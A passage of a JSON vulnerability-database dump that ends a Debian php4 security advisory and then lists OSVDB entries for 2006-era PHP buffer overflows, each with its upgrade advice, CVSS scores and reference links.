ddd893b7f894e6be6eafc4f175946e88\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 13492 2776959aaa4043202778dd5da786fd4a\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 12724 8e03c8b94b4ebfca5c14e6f93311aeb8\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 4856 b80e4b9f76fa63d7770ce797a25cdf21\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 17810 36cf8e4324b3187d6bed4a58a12e7695\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 22742 544732c583f124274a3b06f8d52a3e7c\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 32690 f0f975afe23584600652b1392e794c9d\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 8116 9729746ab8d86903125712f04940f254\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 4642 0b8a4c031386ef47f2439d7ec83719ee\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 9770 c812721f98e44043a4dad6c6d24475a9\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 17252 6ffba7df2f0e57b46f5ea77c0767b8e4\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 12852 b9d12405747e411e21e8f3e12cbd1751\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2007-07-07T00:00:00", "title": "[SECURITY] [DSA 1331-1] New php4 packages fix arbitrary code execution", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:46", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-0207", "CVE-2007-1864"], "modified": "2007-07-07T00:00:00", "id": "DEBIAN:DSA-1331-1:13943", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00092.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "references": [], "edition": 1, "description": "## Vulnerability Description\nPHP contains a flaw related to the use of unspecified unusual characters in session names. No further details have been provided.\n## Solution Description\nUpgrade to version 4.4.3, 5.1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw related to the use of unspecified unusual characters in session names. No further details have been provided.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_3.php\nVendor Specific News/Changelog Entry: http://www.php.net/release_5_1_3.php\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:122)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\nSecurity Tracker: 1016306\n[Secunia Advisory ID:19927](https://secuniaresearch.flexerasoftware.com/advisories/19927/)\n[Secunia Advisory ID:22440](https://secuniaresearch.flexerasoftware.com/advisories/22440/)\n[Secunia Advisory ID:21050](https://secuniaresearch.flexerasoftware.com/advisories/21050/)\n[Secunia Advisory ID:22004](https://secuniaresearch.flexerasoftware.com/advisories/22004/)\n[Secunia Advisory ID:22069](https://secuniaresearch.flexerasoftware.com/advisories/22069/)\n[Secunia Advisory ID:22225](https://secuniaresearch.flexerasoftware.com/advisories/22225/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Secunia Advisory ID:23247](https://secuniaresearch.flexerasoftware.com/advisories/23247/)\n[Related OSVDB ID: 25254](https://vulners.com/osvdb/OSVDB:25254)\n[Related OSVDB ID: 25255](https://vulners.com/osvdb/OSVDB:25255)\nRedHat RHSA: RHSA-2006:0669\nRedHat RHSA: RHSA-2006:0682\nRedHat RHSA: RHSA-2006:0736\nOther Advisory URL: https://issues.rpath.com/browse/RPL-683\n[CVE-2006-3016](https://vulners.com/cve/CVE-2006-3016)\n", "reporter": "OSVDB", "published": "2006-05-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "PHP Session Name Unspecified Character Weakness", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP", "version": "5.1.2", "operator": "eq"}], "cvelist": ["CVE-2006-3016"], "modified": "2006-05-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:25253", "id": "OSVDB:25253", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:26", "references": [], "description": "## Solution Description\nUpgrade to version 5.2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific Solution URL: http://support.veritas.com/docs/285984\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_0.php\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1206)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0061/)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-375-1)\n[Vendor Specific Advisory URL](https://issues.rpath.com/browse/RPL-761)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=304829)\n[Vendor Specific Advisory URL](http://securityresponse.symantec.com/avcenter/security/Content/2006.11.28.html)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/cisco-sr-20070425-http.shtml)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-245.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:196)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061101-01-P.asc)\n[Secunia Advisory ID:22653](https://secuniaresearch.flexerasoftware.com/advisories/22653/)\n[Secunia Advisory ID:22713](https://secuniaresearch.flexerasoftware.com/advisories/22713/)\n[Secunia Advisory ID:22759](https://secuniaresearch.flexerasoftware.com/advisories/22759/)\n[Secunia Advisory ID:22779](https://secuniaresearch.flexerasoftware.com/advisories/22779/)\n[Secunia Advisory ID:22929](https://secuniaresearch.flexerasoftware.com/advisories/22929/)\n[Secunia Advisory ID:23155](https://secuniaresearch.flexerasoftware.com/advisories/23155/)\n[Secunia Advisory ID:22685](https://secuniaresearch.flexerasoftware.com/advisories/22685/)\n[Secunia Advisory ID:22688](https://secuniaresearch.flexerasoftware.com/advisories/22688/)\n[Secunia Advisory ID:23139](https://secuniaresearch.flexerasoftware.com/advisories/23139/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:25047](https://secuniaresearch.flexerasoftware.com/advisories/25047/)\n[Secunia Advisory ID:22693](https://secuniaresearch.flexerasoftware.com/advisories/22693/)\n[Secunia Advisory ID:22753](https://secuniaresearch.flexerasoftware.com/advisories/22753/)\n[Secunia Advisory ID:22881](https://secuniaresearch.flexerasoftware.com/advisories/22881/)\n[Secunia Advisory ID:23247](https://secuniaresearch.flexerasoftware.com/advisories/23247/)\n[Related OSVDB ID: 30178](https://vulners.com/osvdb/OSVDB:30178)\nRedHat RHSA: RHSA-2006:0730\nRedHat RHSA: RHSA-2006:0736\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Nov/0004.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.hardened-php.net/advisory_132006.138.html\nOther Advisory URL: http://www.cisco.com/warp/public/707/cisco-sr-20070425-http.shtml\nNews Article: http://news.com.com/Apple+Mac+OS+X+patch+plugs+31+vulnerabilities/2100-1002_3-6139117.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0574.html\n[CVE-2006-5465](https://vulners.com/cve/CVE-2006-5465)\nBugtraq ID: 20879\n", "edition": 1, "reporter": "OSVDB", "published": "2006-11-02T13:03:48", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "PHP htmlspecialchars() Function UTF-8 Input Overflow", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5465"], "modified": "2006-11-02T13:03:48", "href": "https://vulners.com/osvdb/OSVDB:30179", "id": "OSVDB:30179", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "references": [], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.4.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_4.php\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-342-1)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm)\n[Secunia Advisory ID:22440](https://secuniaresearch.flexerasoftware.com/advisories/22440/)\n[Secunia Advisory ID:22713](https://secuniaresearch.flexerasoftware.com/advisories/22713/)\n[Secunia Advisory ID:22039](https://secuniaresearch.flexerasoftware.com/advisories/22039/)\n[Secunia Advisory ID:22004](https://secuniaresearch.flexerasoftware.com/advisories/22004/)\n[Secunia Advisory ID:22069](https://secuniaresearch.flexerasoftware.com/advisories/22069/)\n[Secunia Advisory ID:22225](https://secuniaresearch.flexerasoftware.com/advisories/22225/)\n[Secunia Advisory ID:22538](https://secuniaresearch.flexerasoftware.com/advisories/22538/)\n[Secunia Advisory ID:21546](https://secuniaresearch.flexerasoftware.com/advisories/21546/)\n[Secunia Advisory ID:21768](https://secuniaresearch.flexerasoftware.com/advisories/21768/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Related OSVDB ID: 27999](https://vulners.com/osvdb/OSVDB:27999)\n[Related OSVDB ID: 28004](https://vulners.com/osvdb/OSVDB:28004)\n[Related OSVDB ID: 28002](https://vulners.com/osvdb/OSVDB:28002)\n[Related OSVDB ID: 28000](https://vulners.com/osvdb/OSVDB:28000)\n[Related OSVDB ID: 28001](https://vulners.com/osvdb/OSVDB:28001)\n[Related OSVDB ID: 28005](https://vulners.com/osvdb/OSVDB:28005)\nRedHat RHSA: RHSA-2006:0669\nRedHat RHSA: RHSA-2006:0682\nOther Advisory URL: https://issues.rpath.com/browse/RPL-683\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Sep/0006.html\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1206\n[CVE-2006-4482](https://vulners.com/cve/CVE-2006-4482)\n", "reporter": "OSVDB", "published": "2006-08-17T04:49:07", "type": "osvdb", "title": "PHP on 64-bit str_repeat() Function Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4482"], "modified": "2006-08-17T04:49:07", "href": "https://vulners.com/osvdb/OSVDB:28003", "id": "OSVDB:28003", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:12", "references": [], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.4.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_4.php\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-342-1)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm)\n[Secunia Advisory ID:22440](https://secuniaresearch.flexerasoftware.com/advisories/22440/)\n[Secunia Advisory ID:22713](https://secuniaresearch.flexerasoftware.com/advisories/22713/)\n[Secunia Advisory ID:22039](https://secuniaresearch.flexerasoftware.com/advisories/22039/)\n[Secunia Advisory ID:22004](https://secuniaresearch.flexerasoftware.com/advisories/22004/)\n[Secunia Advisory ID:22069](https://secuniaresearch.flexerasoftware.com/advisories/22069/)\n[Secunia Advisory ID:22225](https://secuniaresearch.flexerasoftware.com/advisories/22225/)\n[Secunia Advisory ID:22538](https://secuniaresearch.flexerasoftware.com/advisories/22538/)\n[Secunia Advisory ID:21546](https://secuniaresearch.flexerasoftware.com/advisories/21546/)\n[Secunia Advisory ID:21768](https://secuniaresearch.flexerasoftware.com/advisories/21768/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Related OSVDB ID: 27999](https://vulners.com/osvdb/OSVDB:27999)\n[Related OSVDB ID: 28002](https://vulners.com/osvdb/OSVDB:28002)\n[Related OSVDB ID: 28003](https://vulners.com/osvdb/OSVDB:28003)\n[Related OSVDB ID: 28000](https://vulners.com/osvdb/OSVDB:28000)\n[Related OSVDB ID: 28001](https://vulners.com/osvdb/OSVDB:28001)\n[Related OSVDB ID: 28005](https://vulners.com/osvdb/OSVDB:28005)\nRedHat RHSA: RHSA-2006:0669\nRedHat RHSA: RHSA-2006:0682\nOther Advisory URL: https://issues.rpath.com/browse/RPL-683\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Sep/0006.html\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1206\n[CVE-2006-4482](https://vulners.com/cve/CVE-2006-4482)\n", "reporter": "OSVDB", "published": "2006-08-17T04:49:07", "type": "osvdb", "title": "PHP on 64-bit wordwrap() Function Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4482"], "modified": "2006-08-17T04:49:07", "href": "https://vulners.com/osvdb/OSVDB:28004", "id": "OSVDB:28004", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:26", "references": [], "description": "## Solution Description\nUpgrade to version 5.2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific Solution URL: http://support.veritas.com/docs/285984\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_0.php\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1206)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-375-1)\n[Vendor Specific Advisory URL](https://issues.rpath.com/browse/RPL-761)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0061/)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=304829)\n[Vendor Specific Advisory URL](http://securityresponse.symantec.com/avcenter/security/Content/2006.11.28.html)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/cisco-sr-20070425-http.shtml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:196)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-245.htm)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061101-01-P.asc)\n[Secunia Advisory ID:22653](https://secuniaresearch.flexerasoftware.com/advisories/22653/)\n[Secunia Advisory ID:22713](https://secuniaresearch.flexerasoftware.com/advisories/22713/)\n[Secunia Advisory ID:22759](https://secuniaresearch.flexerasoftware.com/advisories/22759/)\n[Secunia Advisory ID:22779](https://secuniaresearch.flexerasoftware.com/advisories/22779/)\n[Secunia Advisory ID:22929](https://secuniaresearch.flexerasoftware.com/advisories/22929/)\n[Secunia Advisory ID:23155](https://secuniaresearch.flexerasoftware.com/advisories/23155/)\n[Secunia Advisory ID:22688](https://secuniaresearch.flexerasoftware.com/advisories/22688/)\n[Secunia Advisory ID:22685](https://secuniaresearch.flexerasoftware.com/advisories/22685/)\n[Secunia Advisory ID:23139](https://secuniaresearch.flexerasoftware.com/advisories/23139/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:25047](https://secuniaresearch.flexerasoftware.com/advisories/25047/)\n[Secunia Advisory ID:22693](https://secuniaresearch.flexerasoftware.com/advisories/22693/)\n[Secunia Advisory ID:22753](https://secuniaresearch.flexerasoftware.com/advisories/22753/)\n[Secunia Advisory ID:22881](https://secuniaresearch.flexerasoftware.com/advisories/22881/)\n[Secunia Advisory ID:23247](https://secuniaresearch.flexerasoftware.com/advisories/23247/)\n[Related OSVDB ID: 30179](https://vulners.com/osvdb/OSVDB:30179)\nRedHat RHSA: RHSA-2006:0730\nRedHat RHSA: RHSA-2006:0736\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Nov/0004.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.hardened-php.net/advisory_132006.138.html\nOther Advisory URL: http://www.cisco.com/warp/public/707/cisco-sr-20070425-http.shtml\nNews Article: http://news.com.com/Apple+Mac+OS+X+patch+plugs+31+vulnerabilities/2100-1002_3-6139117.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0574.html\n[CVE-2006-5465](https://vulners.com/cve/CVE-2006-5465)\nBugtraq ID: 20879\n", "edition": 1, "reporter": "OSVDB", "published": "2006-11-02T13:03:48", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "PHP htmlentities() Function UTF-8 Input Overflow", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5465"], "modified": "2006-11-02T13:03:48", "href": "https://vulners.com/osvdb/OSVDB:30178", "id": "OSVDB:30178", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Vulnerability Description\nPHP contains a flaw that may allow an attacker to gain elevated privileges. The issue is due to the sscanf() function not properly sanitizing user-supplied input. By providing an overly long string, an attacker can trigger a buffer overflow and execute arbitrary code.\n## Solution Description\nUpgrade to version 4.4.4, 5.1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow an attacker to gain elevated privileges. The issue is due to the sscanf() function not properly sanitizing user-supplied input. By providing an overly long string, an attacker can trigger a buffer overflow and execute arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://bugs.php.net/bug.php?id=38322\nVendor Specific News/Changelog Entry: http://www.php.net/release_5_1_5.php\nVendor Specific News/Changelog Entry: http://us2.php.net/releases/4_4_4.php\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-342-1)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2006-Aug/0006.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-28.xml)\n[Secunia Advisory ID:22440](https://secuniaresearch.flexerasoftware.com/advisories/22440/)\n[Secunia Advisory ID:21403](https://secuniaresearch.flexerasoftware.com/advisories/21403/)\n[Secunia Advisory ID:22039](https://secuniaresearch.flexerasoftware.com/advisories/22039/)\n[Secunia Advisory ID:22004](https://secuniaresearch.flexerasoftware.com/advisories/22004/)\n[Secunia Advisory ID:22069](https://secuniaresearch.flexerasoftware.com/advisories/22069/)\n[Secunia Advisory ID:22538](https://secuniaresearch.flexerasoftware.com/advisories/22538/)\n[Secunia Advisory ID:21467](https://secuniaresearch.flexerasoftware.com/advisories/21467/)\n[Secunia Advisory ID:21608](https://secuniaresearch.flexerasoftware.com/advisories/21608/)\n[Secunia Advisory ID:21683](https://secuniaresearch.flexerasoftware.com/advisories/21683/)\n[Secunia Advisory ID:21768](https://secuniaresearch.flexerasoftware.com/advisories/21768/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Secunia Advisory ID:23247](https://secuniaresearch.flexerasoftware.com/advisories/23247/)\nRedHat RHSA: RHSA-2006:0669\nRedHat RHSA: RHSA-2006:0682\nRedHat RHSA: RHSA-2006:0736\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:144\nOther Advisory URL: http://www.plain-text.info/sscanf_bug.txt\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Sep/0006.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0113.html\nFrSIRT Advisory: ADV-2006-3193\n[CVE-2006-4020](https://vulners.com/cve/CVE-2006-4020)\nBugtraq ID: 19415\n", "reporter": "OSVDB", "published": "2006-08-04T06:05:04", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "PHP sscanf() Function Argument Swapping Overflow", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4020"], "modified": "2006-08-04T06:05:04", "href": "https://vulners.com/osvdb/OSVDB:27824", "id": "OSVDB:27824", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "references": [], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.4.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_4.php\nVendor Specific News/Changelog Entry: http://bugs.php.net/bug.php?id=38112\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-342-1)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:162)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm)\n[Secunia Advisory ID:22440](https://secuniaresearch.flexerasoftware.com/advisories/22440/)\n[Secunia Advisory ID:22039](https://secuniaresearch.flexerasoftware.com/advisories/22039/)\n[Secunia Advisory ID:22069](https://secuniaresearch.flexerasoftware.com/advisories/22069/)\n[Secunia Advisory ID:22225](https://secuniaresearch.flexerasoftware.com/advisories/22225/)\n[Secunia Advisory ID:22538](https://secuniaresearch.flexerasoftware.com/advisories/22538/)\n[Secunia Advisory ID:21546](https://secuniaresearch.flexerasoftware.com/advisories/21546/)\n[Secunia Advisory ID:21768](https://secuniaresearch.flexerasoftware.com/advisories/21768/)\n[Secunia Advisory ID:21842](https://secuniaresearch.flexerasoftware.com/advisories/21842/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Related OSVDB ID: 27999](https://vulners.com/osvdb/OSVDB:27999)\n[Related OSVDB ID: 28003](https://vulners.com/osvdb/OSVDB:28003)\n[Related OSVDB ID: 28000](https://vulners.com/osvdb/OSVDB:28000)\n[Related OSVDB ID: 28001](https://vulners.com/osvdb/OSVDB:28001)\n[Related OSVDB ID: 28005](https://vulners.com/osvdb/OSVDB:28005)\nRedHat RHSA: RHSA-2006:0669\nOther Advisory URL: https://issues.rpath.com/browse/RPL-683\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Sep/0006.html\n[CVE-2006-4484](https://vulners.com/cve/CVE-2006-4484)\n", "reporter": "OSVDB", "published": "2006-08-17T04:49:07", "type": "osvdb", "title": "PHP GD Extension GIF Processing Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4484"], "modified": "2006-08-17T04:49:07", "href": "https://vulners.com/osvdb/OSVDB:28002", "id": "OSVDB:28002", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "references": [], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.4.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_4.php\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-362-1)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm)\n[Secunia Advisory ID:22440](https://secuniaresearch.flexerasoftware.com/advisories/22440/)\n[Secunia Advisory ID:25945](https://secuniaresearch.flexerasoftware.com/advisories/25945/)\n[Secunia Advisory ID:22004](https://secuniaresearch.flexerasoftware.com/advisories/22004/)\n[Secunia Advisory ID:22069](https://secuniaresearch.flexerasoftware.com/advisories/22069/)\n[Secunia Advisory ID:22225](https://secuniaresearch.flexerasoftware.com/advisories/22225/)\n[Secunia Advisory ID:22538](https://secuniaresearch.flexerasoftware.com/advisories/22538/)\n[Secunia Advisory ID:21546](https://secuniaresearch.flexerasoftware.com/advisories/21546/)\n[Secunia Advisory ID:22331](https://secuniaresearch.flexerasoftware.com/advisories/22331/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Related OSVDB ID: 27999](https://vulners.com/osvdb/OSVDB:27999)\n[Related OSVDB ID: 28002](https://vulners.com/osvdb/OSVDB:28002)\n[Related OSVDB ID: 28003](https://vulners.com/osvdb/OSVDB:28003)\n[Related OSVDB ID: 28000](https://vulners.com/osvdb/OSVDB:28000)\n[Related OSVDB ID: 28005](https://vulners.com/osvdb/OSVDB:28005)\nRedHat RHSA: RHSA-2006:0669\nRedHat RHSA: RHSA-2006:0682\nOther Advisory URL: https://issues.rpath.com/browse/RPL-683\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1331\n[CVE-2006-4486](https://vulners.com/cve/CVE-2006-4486)\n", "reporter": "OSVDB", "published": "2006-08-17T04:49:07", "type": "osvdb", "title": "PHP on 64-bit memory_limit Unspecified Issue", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4486"], "modified": "2006-08-17T04:49:07", "href": "https://vulners.com/osvdb/OSVDB:28001", "id": "OSVDB:28001", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Vulnerability Description\nPHP contains a flaw that may allow a context-dependent attacker to elevate privileges. The issue is due to the sscanf function in scanf.c not properly sanitizing user-supplied input. Passing a crafted string to this function may trigger a buvver over-read allowing the execution of arbitrary code.\n## Solution Description\nUpgrade to version 4.4.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a context-dependent attacker to elevate privileges. The issue is due to the sscanf function in scanf.c not properly sanitizing user-supplied input. Passing a crafted string to this function may trigger a buvver over-read allowing the execution of arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_4.php\nVendor Specific News/Changelog Entry: http://bugs.php.net/bug.php?id=38322\n[Secunia Advisory ID:21546](https://secuniaresearch.flexerasoftware.com/advisories/21546/)\n[Secunia Advisory ID:23247](https://secuniaresearch.flexerasoftware.com/advisories/23247/)\n[Related OSVDB ID: 27999](https://vulners.com/osvdb/OSVDB:27999)\n[Related OSVDB ID: 28002](https://vulners.com/osvdb/OSVDB:28002)\n[Related OSVDB ID: 28003](https://vulners.com/osvdb/OSVDB:28003)\n[Related OSVDB ID: 28001](https://vulners.com/osvdb/OSVDB:28001)\n[Related OSVDB ID: 28005](https://vulners.com/osvdb/OSVDB:28005)\nRedHat RHSA: RHSA-2006:0736\n[CVE-2006-4020](https://vulners.com/cve/CVE-2006-4020)\n", "reporter": "OSVDB", "published": "2006-08-17T04:49:07", "type": "osvdb", "title": "PHP 